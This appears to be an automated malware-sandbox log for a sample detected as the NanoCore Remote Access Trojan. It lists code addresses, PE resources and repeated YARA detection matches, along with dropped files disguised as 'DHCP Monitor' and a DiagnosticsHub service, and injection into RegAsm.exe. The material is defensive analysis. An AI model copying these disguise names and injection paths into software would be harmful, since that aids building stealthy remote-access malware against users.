Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009EF419	0_2_009EF419
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009E16C4	0_2_009E16C4
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009E1BB8	0_2_009E1BB8
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009F9D05	0_2_009F9D05
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_00E07AC1	1_2_00E07AC1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_04D7B068	1_2_04D7B068
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_04D78798	1_2_04D78798
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_04D723A0	1_2_04D723A0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_04D72FA8	1_2_04D72FA8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_04D7945F	1_2_04D7945F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_04D7306F	1_2_04D7306F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 1_2_04D79398	1_2_04D79398
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 4_2_04A201B7	4_2_04A201B7
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009B7006	12_2_009B7006
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_00993190	12_2_00993190
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_0099710E	12_2_0099710E
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_00994140	12_2_00994140
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_00981287	12_2_00981287
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009AF419	12_2_009AF419
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009B6522	12_2_009B6522
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009A16C4	12_2_009A16C4
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009B267E	12_2_009B267E
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009B89DF	12_2_009B89DF
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009E8B13	12_2_009E8B13
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009B9D05	12_2_009B9D05
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_009ACD61	12_2_009ACD61
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 14_2_02C723A0	14_2_02C723A0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 14_2_02C72FA8	14_2_02C72FA8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 14_2_02C73850	14_2_02C73850
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 14_2_02C7238F	14_2_02C7238F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 14_2_02C7306F	14_2_02C7306F

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: String function: 009E0D27 appears 70 times
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: String function: 009C7F41 appears 34 times
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: String function: 009E8B40 appears 40 times
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: String function: 009A8B40 appears 37 times
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: String function: 009E0D27 appears 70 times
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: String function: 009C7F41 appears 34 times
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: String function: 009E8B40 appears 40 times

Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: e5bd3238d220c97cd4d6969abb3b33e0.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagnosticsHub.StandardCollector.Service.exe.bat.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior

Source: 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000003.255245662.0000000001569000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000003.254485711.00000000015B3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000003.254593335.00000000015B3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000003.254905980.0000000001537000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000003.256228628.00000000040B2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000003.254259059.0000000001589000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000002.323744315.00000000040F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000003.254233252.0000000001613000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000002.522748241.0000000005210000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000002.522748241.0000000005210000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegAsm.exe PID: 4560, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
